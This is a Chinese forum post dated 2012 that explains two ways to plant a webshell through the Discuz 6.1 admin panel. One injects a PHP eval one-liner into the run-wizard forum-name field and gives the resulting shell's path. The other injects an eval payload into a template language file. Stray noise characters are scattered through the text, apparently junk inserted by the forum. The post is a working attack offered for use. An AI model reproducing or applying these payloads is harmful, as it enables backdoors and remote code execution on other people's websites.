discuz6.1两种方法后台拿shell7 c8 I2 s, s, |/ {$ t+ t8 U- l
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下- E; {7 G5 z& A. x) f0 L
1:
0 S# t. t* P {" s: z. c! U- p$ c+ Ohttp://127.0.0.1/discuz/admincp. ... zard&frames=yes8 |/ {7 p1 }, p* [
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
; P9 `% v1 O0 J1 L<?php eval($_POST[cmd]);?>* h( g0 x9 w/ ~2 b- r
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php8 v) U( |. n9 A* s
/ @, z8 Y% }+ z+ }( s
/ W$ I, k# k2 r7 I% e" g4 N4 s1 d
2:后台模板管理--默认模板套系--详情; o6 z6 G, S6 @5 |$ s7 h' y4 `
templates/default/actions.lang.php) Z' p( A% f8 w0 H( @' w
jhackj\\');eval($_POST[cmd])?>;//
. y7 p4 A4 ~) c3 d
2 n5 Y f. J& `$ V* f' u利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对